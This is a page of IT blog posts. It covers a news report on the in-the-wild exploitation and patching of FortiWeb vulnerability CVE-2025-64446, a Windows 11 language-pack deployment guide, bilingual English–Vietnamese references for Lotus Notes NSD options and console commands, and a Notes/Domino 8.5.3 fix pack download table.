Title: Fortinet Announces Critical Vulnerability in Its Web Application Firewall (WAF); Security Firms Reveal It Had Been Exploited Over a Month Earlier

 @https://www.ithome.com.tw/news/172274 

Follow:  www.ithome.com.tw

 

Over the past weekend, Fortinet issued a security advisory for its FortiWeb Web Application Firewall (WAF), disclosing a critical vulnerability CVE-2025-64446. Several cybersecurity companies reported that this flaw had already been actively exploited more than a month ago.

On November 14, Fortinet announced that FortiWeb contains a vulnerability in its graphical user interface (GUI)—a path traversal flaw that allows an unauthenticated attacker to send specially crafted HTTP or HTTPS requests to the target system and execute administrative commands. The CVSS score published by Fortinet is 9.1 (while the U.S. National Vulnerability Database lists it as 9.8).
Fortinet stated that this vulnerability has been used in real-world attacks and advised IT personnel to urgently update their systems to the latest version. If updates cannot be applied immediately, Fortinet recommends temporarily disabling HTTP or HTTPS access to Internet-facing administrative interfaces.
On the same day, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to patch it within one week.

According to several cybersecurity media outlets, Fortinet learned about the flaw through reports from security firms that had detected exploitation activity more than a month prior. For example, Defused reported on October 6 that they detected abnormal exploit activity: attackers were using JSON Web Tokens (JWT) with valid payloads to create administrative accounts through an unknown vulnerability, suspected to be a variant of CVE-2022-40684. Notably, when Defused uploaded the payload to VirusTotal, all 95 antivirus engines deemed it harmless.

Subsequently, other cybersecurity companies joined the investigation and published their findings. For instance, PwnDefend, working with Defused, reported that attackers sent payloads via HTTP POST to specific endpoints to create user accounts; PwnDefend also published Indicators of Compromise (IoCs), including attacker IP addresses, account names, and passwords created by the attack.
Orange Cyberdefense confirmed that the vulnerability had been exploited widely and stated that Fortinet had fixed the issue in FortiWeb versions 8.0.2, 7.6.5, 7.4.10, and 7.2.12.
Additionally, Rapid7 discovered that on November 6 someone had attempted to sell a FortiWeb zero-day vulnerability on a hacker forum, though it could not be confirmed whether it was CVE-2025-64446.

According to watchTowr’s analysis, the flaw actually consists of two combined issues: a path traversal vulnerability in the URI and an authentication bypass via HTTP request headers. They believe Fortinet may have known about the vulnerability earlier, as their examination of FortiWeb 8.0.2 revealed patched code that was not mentioned in Fortinet’s release notes. watchTowr also released a Proof-of-Concept (PoC) video demonstrating that sending a valid payload allows successful login to FortiWeb.

Read more »

Posted in: FortiGate

MUI language Packs... Windows 11 Guide

 

Here’s a detailed guide for working with MUI (Multilingual User Interface) language packs on Windows 11 — useful for your IT environment (MISDUONG) when you need to deploy or manage multiple languages.

What is an MUI language pack?

“MUI” stands for Multilingual User Interface. It allows Windows to display menus, dialog boxes, and other interface elements in a different language from the base installation. (Wikipedia)
Basically: you have Windows installed (e.g., in English) and you add a language pack so the UI shows in another language (e.g., Vietnamese, French, etc.).

Why it matters in enterprise/IT environments

• For global or multi‑regional deployments (users in Vietnam + Indonesia + Taiwan etc.), you’ll likely need language flexibility.

• When building images or deploying via tools like System Center Configuration Manager (SCCM), you might want language packs pre‑injected to avoid post‑deployment configuration. (System Center Dudes)

• For consistency across user profiles, system/Welcome screen, new user accounts, etc., you may need to copy settings (in e.g., Azure/Intune) so new users see the correct language. (MSEndpointMgr)

Step‑by‑step guide: installing a language pack (for a single machine)

Here’s how to do it on Windows 11 for an existing machine.

1. Go to Settings → Time & language → Language & region. (Microsoft Support)

2. Under Preferred languages, click Add a language. (Microsoft Support)

3. Search for the language you want (e.g., “Vietnamese / Tiếng Việt”) and select it.

4. In the next screen choose the options:

   • Install language pack (make sure this checkbox is checked)

   • Set as my display language (if you want it to replace the current display language)

   • (Optionally) include features like Speech, Handwriting, Text‑to‑Speech if available for that language. (InformatiWeb)

5. Click Install. Wait while Windows downloads and applies the pack.

6. After installation you’ll likely need to sign out (or restart) for the change to fully take effect. (InformatiWeb)

7. After signing back in: verify in Settings → Time & language → Language & region that the “Windows display language” reflects your new choice. Also check Settings → Time & language → Speech if you installed speech recognition/voice features. (InformatiWeb)

8. Finally, adjust Regional format, Time zone, Date/Time settings, and keyboard input layout, if needed. For example if you moved from US settings to Vietnam you’d set the appropriate time zone, regional format. (InformatiWeb)

Considerations & Tips for enterprise deployment

Since you’re in IT and might be managing many machines, here are extra tips:

• If you build images (for new machines) for multiple languages, you can inject language packs and Features‑On‑Demand (FOD) offline (in the image) so users don’t have to download at first boot. (System Center Dudes)

• Use tools like DISM (Deployment Image Servicing and Management) to inject .cab files of language packs, and add capabilities like Language.Basic, Language.Handwriting, Language.Speech, etc. (System Center Dudes)

• When you deploy via Autopilot / Intune / SCCM: install the language pack first (system context), then apply settings (user context) to set the display language, input methods, etc. (MSEndpointMgr)

• Make sure the version of the language pack matches the Windows version (e.g., 22H2, 23H2, etc) to avoid compatibility issues. (Microsoft Learn)

• For multi‑language support: you can either have one host pool per language, or one host pool with multiple languages installed and let users switch. The second is more resource‑efficient but requires more configuration. (Microsoft Learn)

• Watch for any “Single Language” editions of Windows: some editions restrict the number of display languages you can switch. For example older versions of Windows had limitations on Single Language SKUs. (Wikipedia)

Common issues & troubleshooting

• After installing a language pack you may still see some parts of the UI in the old language (common with settings or system apps). Signing out or restarting usually fixes it. (InformatiWeb)

• In enterprise deployments, if you install as system but user profile remains in old language, you will need to run script or use policy to copy language settings to new user accounts / Welcome screen. (MSEndpointMgr)

• If languages are missing features (e.g., speech or handwriting) it may be because the language pack only supports UI but not full features in your region. You may need to install a “base” language pack then add a “regional variant”. Example: install French (France) pack then French (Belgium) on top of it. (InformatiWeb)

Specific for Vietnamese (Tiếng Việt) scenario

Since you are located in Vietnam (HCMC), you might want to apply Vietnamese language / region settings:

• In “Add a language”, search for “Vietnamese / Tiếng Việt”.

• After installation, set “Windows display language” to Vietnamese.

• Under Region select Vietnam, and set the time zone to (UTC+07:00) Bangkok, Hanoi, Jakarta.

• Keyboard layout: you may want Vietnamese (Telex) or similar input method if needed.

• If you deploy multiple machines across sites (Vietnam, Indonesia, Taiwan), you can pre‑install Vietnamese, Indonesian (Bahasa Indonesia), Traditional Chinese (Taiwan) language packs in your image to support local users.

Summary

• MUI language packs on Windows 11 allow UI localisation (menus, dialogs) in other languages.

• For a single machine you install via Settings → Time & language → Add a language → Install, then sign out.

• For enterprise deployment you should image with language packs / FODs pre‑injected and/or use scripts/policies to set user language settings.

• Always align versions, do regional/time‑zone adjustments, and test user login to ensure all parts of UI are localised.
  
  

Read more »

Lotus Notes Commands : NSD Command Line Options Tùy chọn dòng lệnh NSD

 

Dưới đây là bản dịch song ngữ Anh–Việt của phần NSD Command Line Options mà bạn gửi. Tôi đã giữ cấu trúc gọn gàng, mỗi tùy chọn có mô tả tiếng Anh kèm theo tiếng Việt:

---

NSD Command Line Options

Tùy chọn dòng lệnh NSD

---

–adc

English: Forces ADC to run when Notes/Domino is restarted. This is triggered by leaving a file named enable.adc in the data directory. The startup code looks for this file.
Tiếng Việt: Buộc ADC chạy khi Notes/Domino được khởi động lại. Điều này được kích hoạt bằng cách để một tập tin có tên enable.adc trong thư mục dữ liệu. Mã khởi động sẽ tìm tập tin này.

---

–allhandles

English: Outputs system handle tables for all processes. Default is to output system handles for Notes processes only. Specifying –allhandles significantly increases log file size.
Tiếng Việt: Xuất bảng handle hệ thống cho tất cả các tiến trình. Mặc định chỉ xuất handle cho các tiến trình Notes. Chỉ định –allhandles sẽ làm kích thước file log tăng đáng kể.

---

–b modulepath

English: Specifies the path to locate load modules. By default, NSD looks in locations specified in the system PATH variable.
Tiếng Việt: Chỉ định đường dẫn để tìm các module nạp. Mặc định, NSD tìm ở các vị trí được định nghĩa trong biến môi trường PATH của hệ thống.

---

–batch

English: Runs NSD in batch mode. By default, NSD runs interactively. Useful for cron jobs, remote shells, or slow modem connections.
Tiếng Việt: Chạy NSD ở chế độ batch. Mặc định NSD chạy tương tác. Tùy chọn này hữu ích khi chạy từ cron job, shell từ xa, hoặc kết nối modem chậm.

Note / Lưu ý:

• Chuyển đến thư mục dữ liệu Notes trước khi chạy NSD ở chế độ batch.

• File log vẫn được tạo ở thư mục hiện hành; có thể redirect output hoặc dùng –nolog.

Example / Ví dụ:

nsd –batch –nolog >myfile.log

---

–checklevel=n

English: Memory check level for memcheck (1 = static DPOOLs, 2 = include POOLs, VPOOLs, etc.).
Tiếng Việt: Mức kiểm tra bộ nhớ cho memcheck (1 = kiểm tra DPOOL tĩnh, 2 = bao gồm POOLs, VPOOLs, v.v.).

---

–cmdfile commandfile

English: Provide NSD with a text file of console commands. Qualifiers can control execution timing (@preinit, @postinit, @end).
Tiếng Việt: Cung cấp tập tin lệnh NSD. Các qualifier xác định thời điểm thực thi (@preinit, @postinit, @end).

---

–coreflags flag,flag,flag...

English: Flags for Win32 minidump API when creating core dump. Can also use a single hex value. Default: CoreNormal.
Tiếng Việt: Các flag cho Win32 minidump API khi tạo core dump. Có thể dùng một giá trị hex duy nhất. Mặc định: CoreNormal.

---

–coretype type,type...

English: Determines when NSD generates core dump files (NONE, CRASH, PID, ALL). Default: PID,CRASH.
Tiếng Việt: Xác định khi nào NSD tạo core dump (NONE, CRASH, PID, ALL). Mặc định: PID,CRASH.

---

–crashpid pid

English: Specifies the process ID of a faulting process for prioritized stack dumping.
Tiếng Việt: Chỉ định PID của tiến trình lỗi để ưu tiên dump stack.

---

–crashtid tid

English: Specifies the thread ID of a faulting thread for prioritized stack dumping.
Tiếng Việt: Chỉ định TID của thread lỗi để ưu tiên dump stack.

---

–detach

English: Detaches NSD from attached processes during data collection. Obsolete in newer Windows versions.
Tiếng Việt: Ngắt NSD khỏi các tiến trình đã attach trong quá trình thu thập dữ liệu. Không còn cần thiết trên Windows mới.

---

–disasm count / –disassemble count

English: Number of instructions (0–100) to disassemble around faulting address. 0 disables disassembly. Default: 10.
Tiếng Việt: Số lệnh (0–100) để disassemble quanh địa chỉ lỗi. 0 tắt disassembly. Mặc định: 10.

---

–dlgopts opt

English: Controls NSD status dialog display. Options include noshow, show&h, show&d.
Tiếng Việt: Điều khiển hiển thị hộp thoại trạng thái NSD. Các tùy chọn gồm noshow, show&h, show&d.

---

–doannotate NSDlogname

English: Annotates stack symbols in the specified NSD log file without filtering. Output to ant.doannotate.log.
Tiếng Việt: Chú thích các symbol trong file log NSD mà không lọc. Output vào ant.doannotate.log.

---

–dumpandkill

English: Terminates all Notes processes after analysis. With Domino fault recovery, may restart service if run as a service.
Tiếng Việt: Kết thúc tất cả tiến trình Notes sau khi phân tích. Với Domino fault recovery, có thể khởi động lại dịch vụ nếu chạy dưới dạng service.

---

–dumpvars

English: Dumps all NSD environment variables and quits. Shows scope, name, value, type.
Tiếng Việt: Xuất tất cả biến môi trường NSD và thoát. Hiển thị phạm vi, tên, giá trị và kiểu dữ liệu.

---

–excludedprocesses name,name,...

English: Skip specified processes when collecting system handle info. Defaults: lsass.exe, hulsrvc.exe, mdm.exe.
Tiếng Việt: Bỏ qua các tiến trình được liệt kê khi thu thập thông tin handle hệ thống. Mặc định: lsass.exe, hulsrvc.exe, mdm.exe.

---

–filter / –filter1 NSDlogname

English: Filter and optionally annotate a NSD log file. Output to f.filter.log.
Tiếng Việt: Lọc và chú thích (tùy chọn) file log NSD. Output vào f.filter.log.

---

–flushlog / –flushlogwritecount count

English: Forces NSD to flush buffered log output to disk. Default count: 100.
Tiếng Việt: Ép NSD ghi dữ liệu log đã buffer ra đĩa. Số lần ghi mặc định: 100.

---

–fullver / –fullversion

English: Displays full NSD version info and exits. Includes Notes version, OS, CC Fix, build timestamp.
Tiếng Việt: Hiển thị thông tin đầy đủ về phiên bản NSD và thoát. Bao gồm phiên bản Notes, OS, CC Fix, thời gian build.

---

–handles / –hang / –help / –hostnamelookup / –info

English:

• –handles: Limits output to process list & system handles.

• –hang: Repeats stack and javacore dumps for hang diagnosis.

• –help [option]: Shows help for NSD or a specific option.

• –hostnamelookup: Maps IP to hostnames in network info.

• –info: Limits output to system info sections.

Tiếng Việt:

• –handles: Giới hạn output chỉ danh sách tiến trình & handle hệ thống.

• –hang: Lặp dump stack & javacore để chuẩn đoán treo.

• –help [option]: Hiển thị trợ giúp cho NSD hoặc một tùy chọn cụ thể.

• –hostnamelookup: Chuyển IP sang hostname trong thông tin mạng.

• –info: Giới hạn output chỉ các phần thông tin hệ thống.

---

–ini defaultINIfile

English: Specifies notes.ini file location. Only needed if not in standard location.
Tiếng Việt: Chỉ định vị trí notes.ini. Chỉ cần nếu không ở vị trí chuẩn.

---

–kill

English: Kills all Notes/Domino processes in current "partition". Logs limited info.
Tiếng Việt: Kết thúc tất cả tiến trình Notes/Domino trong "partition" hiện tại. Log chỉ chứa thông tin hạn chế.

---

–language / –lang / –nsdlanguage

English: Specifies NSD language for strings lookup. Default: en-US.
Tiếng Việt: Chỉ định ngôn ngữ NSD để tra cứu chuỗi. Mặc định: en-US.

---

–lno / –nolog / –nomemcheck / –noparms / –noperf / –noshortstacks

English: Options to include line numbers, disable logging, skip memory check, skip stack params, skip performance data, skip short stack handling.
Tiếng Việt: Bao gồm số dòng, tắt logging, bỏ kiểm tra bộ nhớ, bỏ param stack, bỏ dữ liệu hiệu năng, bỏ xử lý short stack.

---

–p pid / –pn processname / –parms / –parmsize / –perf / –ps

English: Attach to PID or processname, dump thread stacks, optionally parameters, performance, process summary.
Tiếng Việt: Attach vào PID hoặc tên tiến trình, dump thread stack, tùy chọn param, hiệu năng, tóm tắt tiến trình.

---

–qjit / –refresh / –remote_drives / –repeat / –runtime

English:

• –qjit: Reports Just-in-Time Debugger settings.

• –refresh: Refresh interval (ms) for interactive mode.

• –remote_drives: Output remote drives status.

• –repeat: Number of times to dump logs for hang diagnosis.

• –runtime: Max runtime in seconds before force termination.

Tiếng Việt:

• –qjit: Báo cáo thiết lập Just-in-Time Debugger.

• –refresh: Khoảng refresh (ms) khi chạy tương tác.

• –remote_drives: Xuất trạng thái ổ đĩa từ xa.

• –repeat: Số lần dump log để chuẩn đoán treo.

• –runtime: Thời gian tối đa chạy trước khi kết thúc cưỡng bức.

---

–shortstackdumpsize / –shortstackframethreshold / –shortstacks

English: Configure truncated stack dumping. Default threshold: 5 frames. Default stack type: fatalonly.
Tiếng Việt: Cấu hình dump stack bị cắt. Ngưỡng mặc định: 5 frames. Loại stack mặc định: fatalonly.

---

–showcancelwarning / –spawnmemcheck / –stacks

English:

• –showcancelwarning: Display confirmation dialog on cancel.

• –spawnmemcheck: Run memcheck in separate child process.

• –stacks: Limit output to thread stacks of current instance.

Tiếng Việt:

• –showcancelwarning: Hiển thị hộp thoại xác nhận khi nhấn Cancel.

• –spawnmemcheck: Chạy memcheck ở tiến trình con riêng.

• –stacks: Giới hạn output chỉ thread stack của instance hiện tại.

---

–svcinst / –svclog / –svcreport / –svcstart / –svcstop / –svcuninst

English: Install, start, stop, log, or uninstall NSD Win32 service. Only for Windows Notes/Domino.
Tiếng Việt: Cài đặt, khởi động, dừng, ghi log, hoặc gỡ dịch vụ NSD Win32. Chỉ dùng trên Windows Notes/Domino.

---

–syslog / –syslogdates / –sysloggroup / –syslogsev

English: Configure reporting of Windows event logs in NSD logs. Can limit by dates, group, or severity.
Tiếng Việt: Cấu hình báo cáo Windows event log trong NSD. Có thể giới hạn theo ngày, nhóm, hoặc mức độ nghiêm trọng.

---

–termstatus

English: Return code to use when killing processes via fault recovery. Default: 1.
Tiếng Việt: Mã trả về khi kết thúc tiến trình qua fault recovery. Mặc định: 1.

---

–ver / –version

English: Displays NSD version string.
Tiếng Việt: Hiển thị chuỗi phiên bản NSD.

---

–verboselevel

English: 1–4, controls verbosity. Level 4 outputs memory blocks in hex (use caution).
Tiếng Việt: 1–4, điều khiển mức chi tiết output. Mức 4 xuất bộ nhớ theo hex (cẩn thận vì log sẽ rất lớn).

---

–watchlog / –watchlogrepeat / –watchlogsize / –watchlogwait

English: Watch tail of NSD log during execution. Useful for detecting loops, hangs, or long processing.
Tiếng Việt: Quan sát phần cuối của log NSD khi chạy. Hữu ích để phát hiện vòng lặp, treo, hoặc chạy quá lâu.

---

END

Read more »

Lotus Notes Commands "NSD Console Commands | Các Lệnh Console NSD"

 

Dưới đây là bản dịch song ngữ (Tiếng Việt – English) của nội dung bạn cung cấp:

---

NSD Console Commands
Các Lệnh Console NSD

When run in monitor mode, NSD displays a console prompt from which you can issue a number of commands. NSD performs each command, producing output as requested and reissuing the prompt until you issue the QUIT or EXIT command to exit.
Khi chạy ở chế độ monitor, NSD hiển thị một dấu nhắc lệnh console, từ đó bạn có thể thực hiện nhiều lệnh. NSD sẽ thực thi từng lệnh, xuất kết quả theo yêu cầu và hiển thị lại dấu nhắc cho đến khi bạn sử dụng lệnh QUIT hoặc EXIT để thoát.

---

ALL
Chạy tất cả các lệnh sau: DUMP, MEMCHECK, PERF, HANDLES, WALKMEM và PS.

CALL commandFile
Opens the specified commandFile and processes all the commands contained in it. If CALL is specified from a command file, the original command file picks up where it left off when the called command file completes.
Mở file lệnh được chỉ định và thực thi tất cả các lệnh bên trong nó. Nếu CALL được sử dụng từ một file lệnh khác, file lệnh gốc sẽ tiếp tục từ vị trí đã dừng khi file lệnh được gọi kết thúc.

The CALL command is a useful way of grouping commands for various purposes. For example, if you write a command file that contains a REPEAT command that specifies a CALL command for a command file containing a list of commands, you effectively extend the value of REPEAT beyond repeating a single command.
Lệnh CALL hữu ích để nhóm các lệnh cho nhiều mục đích khác nhau. Ví dụ, nếu bạn tạo một file lệnh có chứa lệnh REPEAT chỉ định một lệnh CALL đến một file lệnh chứa danh sách các lệnh, bạn sẽ mở rộng khả năng của REPEAT vượt quá việc lặp lại một lệnh duy nhất.

See documentation on the –cmdfile option in NSD Command Line Options for more information about command files.
Xem tài liệu về tùy chọn –cmdfile trong NSD Command Line Options để biết thêm thông tin về file lệnh.

---

DETACH
Use the DETACH command to detach from all attached processes. This command is only available on certain versions of Windows (XP and 2003 Server). By issuing the DETACH command before EXIT (or QUIT), NSD will exit without terminating any of the processes it debugged interactively.
Sử dụng lệnh DETACH để tách khỏi tất cả các tiến trình đã gắn. Lệnh này chỉ có trên một số phiên bản Windows (XP và 2003 Server). Khi thực hiện lệnh DETACH trước EXIT (hoặc QUIT), NSD sẽ thoát mà không kết thúc bất kỳ tiến trình nào mà nó đã gỡ lỗi tương tác.

---

DUMP

DUMP pid
Dumps the stacks for all the threads of the specified process, if pid is specified. If pid is not specified, thread stacks for all attached processes are dumped.
Xuất stack của tất cả các thread của tiến trình được chỉ định, nếu pid được cung cấp. Nếu không cung cấp pid, stack của tất cả các tiến trình được gắn sẽ được xuất.

---

ECHO text
Echos the rest of the line to the console.
Hiển thị phần còn lại của dòng lệnh ra console.

---

EXIT [–f]
Use the EXIT command to exit NSD. To force the termination of attached processes, include the –f option. QUIT and EXIT are synonyms.
Sử dụng lệnh EXIT để thoát NSD. Để ép kết thúc các tiến trình đã gắn, thêm tùy chọn –f. QUIT và EXIT là từ đồng nghĩa.

---

GCORE pid
Generates a core dump of the specified process (if –coretype pid is specified or set by default) or for all processes (if –coretype all is specified).
Tạo core dump cho tiến trình được chỉ định (nếu –coretype pid được chỉ định hoặc mặc định) hoặc cho tất cả các tiến trình (nếu –coretype all được chỉ định).

---

GSET
The GSET command is the same as the SET command.
Lệnh GSET giống như lệnh SET.

---

HANDLES [pid]
Dumps the process handles for the specified process pid or for all processes if pid is not specified.
Xuất các handle của tiến trình pid được chỉ định hoặc tất cả tiến trình nếu pid không được chỉ định.

---

HELP
Displays the NSD Console Commands help document (this file)
Hiển thị tài liệu hướng dẫn các lệnh NSD Console (tệp này)

---

KILL
Kills all Notes/Domino processes for the current Notes/Domino instance and cleans up resources.
Kết thúc tất cả các tiến trình Notes/Domino cho instance hiện tại và giải phóng tài nguyên.

---

LOAD program [args]
Loads and debugs the specified program. The optional args, if specified, are passed as is on the program command line when NSD loads it for debugging.
Tải và gỡ lỗi chương trình được chỉ định. Tham số args tùy chọn sẽ được truyền nguyên trạng khi NSD tải chương trình để gỡ lỗi.

---

LOGCON
Switches the logging of command output to the console.
Chuyển chế độ ghi nhật ký đầu ra lệnh ra console.

---

MEMCHECK args
Runs memcheck with optional args. See Memcheck Command Line Options for documentation on possible values for args.
Chạy memcheck với các tham số args tùy chọn. Xem Memcheck Command Line Options để biết giá trị có thể của args.

---

PERF
Displays system performance data.
Hiển thị dữ liệu hiệu năng hệ thống.

---

PS

PS all
Run with no args, the PS command displays the process tree for the current Notes/Domino instance. Run with the argument "all", the process tree for all processes is displayed.
Chạy mà không có tham số, lệnh PS hiển thị cây tiến trình của instance Notes/Domino hiện tại. Với tham số "all", hiển thị cây tiến trình của tất cả các tiến trình.

---

QUIT
Use the QUIT command to exit NSD. To force the termination of attached processes, include the –f option. QUIT and EXIT are synonyms.
Sử dụng lệnh QUIT để thoát NSD. Để ép kết thúc các tiến trình đã gắn, thêm tùy chọn –f. QUIT và EXIT là từ đồng nghĩa.

---

REPEAT count freq [units] command [command–args]
REPEAT STOP command [command–args]
REPEAT SHOW
Use the REPEAT command to repeat another command a specified number of times and at a specified frequency.
Sử dụng lệnh REPEAT để lặp lại một lệnh khác một số lần nhất định với tần suất được chỉ định.

The count, freq and command arguments are required, where:
Các tham số count, freq và command là bắt buộc, bao gồm:

• count is the number of times to run command; count must be non–0
  count là số lần thực hiện lệnh; phải khác 0

• delay is how long to wait between iterations (some non–0 number)
  delay là thời gian chờ giữa các lần lặp (số khác 0)

• units (optional) is the units used to specify delay, and can be "h" for hours, "m" for minutes, "s" for seconds, or "ms" for milliseconds. The default is "ms"
  units (tùy chọn) là đơn vị của delay: "h" giờ, "m" phút, "s" giây, "ms" mili giây. Mặc định là "ms"

• command is a valid NSD command that you want to run repeatedly
  command là lệnh NSD hợp lệ mà bạn muốn lặp

• command–args specifies valid arguments to command as needed
  command–args là các tham số hợp lệ cho lệnh nếu cần

Note that REPEAT, KILL, EXIT and QUIT commands cannot be repeated. Other commands may or may not make sense depending on context, so please use common sense.
Lưu ý: các lệnh REPEAT, KILL, EXIT và QUIT không thể lặp lại. Các lệnh khác có thể hợp lý hoặc không tùy vào ngữ cảnh, vì vậy hãy dùng hợp lý.

Only one instance of any given command can be repeated; any REPEAT command that matches an existing repeating command replaces the existing instance.
Chỉ có một phiên bản của mỗi lệnh có thể được lặp; nếu REPEAT trùng với lệnh đang lặp, nó sẽ thay thế lệnh đó.

To cancel a repeating command, issue the REPEAT STOP command:
Để hủy một lệnh lặp, sử dụng lệnh REPEAT STOP:

• command is the NSD command that you want to stop running repeatedly
  command là lệnh NSD bạn muốn dừng lặp

• command–args specifies valid arguments to command as needed
  command–args là tham số hợp lệ của lệnh nếu cần

For REPEAT STOP, command and command–args must be identical to what was specified in a previous REPEAT command
Với REPEAT STOP, command và command–args phải giống với lệnh REPEAT trước đó

To list all repeating commands, issue the REPEAT SHOW command with no additional arguments
Để liệt kê tất cả các lệnh lặp, sử dụng lệnh REPEAT SHOW mà không thêm tham số nào.

---

SET variable=value
SET
When run without arguments, the SET command displays all currently defined NSD.INI variables. Each listed variable is displayed, showing the type of variable (all are local for now), the name of the variable, its value and its data type (int, bool, string).
Khi chạy mà không có tham số, lệnh SET hiển thị tất cả các biến NSD.INI hiện có, bao gồm loại biến (tất cả hiện tại là local), tên, giá trị và kiểu dữ liệu (int, bool, string).

When run with variable=value, the SET command defines the named variable, setting it to the specified value. The type of the variable is automatically determined by the value (int, bool or string). If variable represents an existing NSD.INI variable, SET replaces the existing definition.
Khi chạy với variable=value, SET sẽ tạo biến được đặt tên và gán giá trị chỉ định. Kiểu dữ liệu được xác định tự động theo giá trị (int, bool hoặc string). Nếu biến đã tồn tại trong NSD.INI, SET sẽ ghi đè.

Note that all changes to the list of NSD.INI variables take immediate effect and are automatically reflected in the NSD.INI file when NSD exits.
Lưu ý: mọi thay đổi đối với danh sách biến NSD.INI có hiệu lực ngay lập tức và được phản ánh tự động trong file NSD.INI khi NSD thoát.

---

SLEEP seconds
The SLEEP command pauses NSD process execution for the specified number of seconds. This command is most useful when specified in a command file for cases where waiting between commands is required for some purpose.
Lệnh SLEEP tạm dừng thực thi NSD trong số giây được chỉ định. Lệnh này hữu ích khi sử dụng trong file lệnh cần chờ giữa các lệnh.

---

UNSET variable
The UNSET command removes the definition of the specified NSD.INI variable.
Lệnh UNSET xóa định nghĩa của biến NSD.INI được chỉ định.

Note that all changes to the list of NSD.INI variables take immediate effect and are automatically reflected in the NSD.INI file when NSD exits.
Mọi thay đổi đối với danh sách biến NSD.INI có hiệu lực ngay lập tức và được phản ánh tự động trong file NSD.INI khi NSD thoát.

---

WALKMEM [pid]
Outputs the process memory maps for the specified pid or for all processes, if pid is not specified.
Xuất bản đồ bộ nhớ của tiến trình được chỉ định hoặc tất cả các tiến trình nếu pid không được chỉ định.

---

END

Read more »

Posted in: lotus,Lotus administrator,Lotus Notes

Download options for Notes/Domino 8.5.3 Fix Packs

 

Downloadable files

Abstract

This document provides download information for Notes/Domino 8.5.3 Fix Packs, including Fix Central Fix IDs and Passport Advantage part numbers.

Download Description

---

	8.5.3 Fix Pack 5 Incremental Installers
	8.5.3 Fix Pack 4 Incremental Installers
	8.5.3 Fix Pack 3 Incremental Installers
	8.5.3 Fix Pack 2 Incremental Installers
	8.5.3 Fix Pack 1 Incremental Installers
	Additional information

---

NOTE: The installer for Domino Interim Fixes (hotfixes) and Fix Packs built 9 July 2012 or later requires a Perl 5.6.0 or later distribution on Unix & Linux platforms. For details, see technote 1600910.

8.5.3 Fix Pack 5 Incremental Installers

• Notes/Domino 8.5.3 Fix Pack 5 Release Notice & "Top 20" Fix List

Notes Basic Configuration

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	Notes_853FP5_Basic_W32	lotus_notes853FP5_basic_win.exe	CIN2QEN
Mac	Notes_853FP5_Basic_MAC	lotus_notes853FP5_basic_mac.dmg	CIN2REN

Notes Standard Configuration

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	Notes_853FP5_Standard_W32	lotus_notes853FP5_win.exe	CIN2TEN
Mac	Notes_853FP5_Standard_MAC	lotus_notes853FP5_mac.dmg	CIN2SEN
Linux (Debian Install)	Notes_853FP5_Standard_DebianInstall_Linux	lotus_notes853FP5_linuxUb.tar	CIN2VEN
Linux (RPM Install)	Notes_853FP5_Standard_RPMInstall_Linux	lotus_notes853FP5_linux.tar	CIN2UEN

Domino

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	DominoServer_853FP5_W32	lotus_domino853FP5_w32.exe	CIN2XEN
W64	DominoServer_853FP5_W64	lotus_domino853FP5_w64.exe	CIN2YEN
Solaris	DominoServer_853FP5_Sol	lotus_domino853FP5_solaris.tar	CIN2ZEN
Linux	DominoServer_853FP5_Linux	lotus_domino853FP5_linux_x86.tar	CIN30EN
AIX	DominoServer_853FP5_AIX32	lotus_domino853FP5_aix32.tar	CIN31EN
AIX64	DominoServer_853FP5_AIX64	lotus_domino853FP5_aix64.tar	CIN32EN
zSeries	DominoServer_853FP5_zSeries	lotus_domino853FP5_zlinux64.tar	CIN33EN
IBM i 5.4	DominoServer_853FP5_IBMi_5.4	lotus_domino853FP5_systemiv5.exe	CIN2PEN
IBM i 6.1 & 7.1	DominoServer_853FP5_IBMi_6.1_7.1	lotus_domino853FP5_systemiv6v7.exe	CIN2WEN

 

 

Notes Basic Configuration

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	Effective 14 May 2013, the Windows version of Notes 8.5.3 Fix Pack 4 is superseded by a revised version of Interim Fix 1 for Notes 8.5.3 Fix Pack 4, which is available for download from Fix Central. For download links and background information, see technote 1636024 - Interim Fix 1 for IBM Notes 8.5.3 Fix Pack 4
Mac	Notes_853FP4_Basic_MAC	lotus_notes853FP4_basic_mac.dmg	CIH96EN

Notes Standard Configuration

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	Effective 14 May 2013, the Windows version of Notes 8.5.3 Fix Pack 4 is superseded by a revised version of Interim Fix 1 for Notes 8.5.3 Fix Pack 4, which is available for download from Fix Central. For download links and background information, see technote 1636024 - Interim Fix 1 for IBM Notes 8.5.3 Fix Pack 4
Mac	Notes_853FP4_Standard_MAC	lotus_notes853FP4_mac.dmg	CIH97EN
Linux (Debian Install)	Notes_853FP4_Standard_DebianInstall_Linux	lotus_notes853FP4_linuxUb.tar	CIH9AEN
Linux (RPM Install)	Notes_853FP4_Standard_RPMInstall_Linux	lotus_notes853FP4_linux.tar	CIH99EN

Domino

Platform	Fix Central		Passport Advantage Part Number
	Fix ID	File name & Download link
W32	DominoServer_853FP4_W32	lotus_domino853FP4_w32.exe	CIH9DEN
W64	DominoServer_853FP4_W64	lotus_domino853FP4_w64.exe	CIH9EEN
Solaris	DominoServer_853FP4_Sol	lotus_domino853FP4_solaris.tar	CIH9FEN
Linux	DominoServer_853FP4_Linux	lotus_domino853FP4_linux_x86.tar	CIH9GEN
AIX	DominoServer_853FP4_AIX32	lotus_domino853FP4_aix32.tar	CIH9HEN
AIX64	DominoServer_853FP4_AIX64	lotus_domino853FP4_aix64.tar	CIH9IEN
zSeries	DominoServer_853FP4_zSeries	lotus_domino853FP4_zlinux64.tar	CIH9JEN
IBM i 5.4	DominoServer_853FP4_IBMi_5.4	lotus_domino853FP4_systemiv5.exe	CIH9BEN
IBM i 6.1 & 7.1	DominoServer_853FP4_IBMi_6.1_7.1	lotus_domino853FP4_systemiv6v7.exe	CIH9CEN

8.5.3 Fix Pack 3 Incremental Installers

• Notes/Domino 8.5.3 Fix Pack 3 Release Notice & "Top 20" Fix List

Fix Central

Domino

Platform	Individual Fix IDs	File name & Download link
W32	DominoServer_853FP3_W32	lotus_domino853FP3_w32.exe
W64	DominoServer_853FP3_W64	lotus_domino853FP3_w64.exe
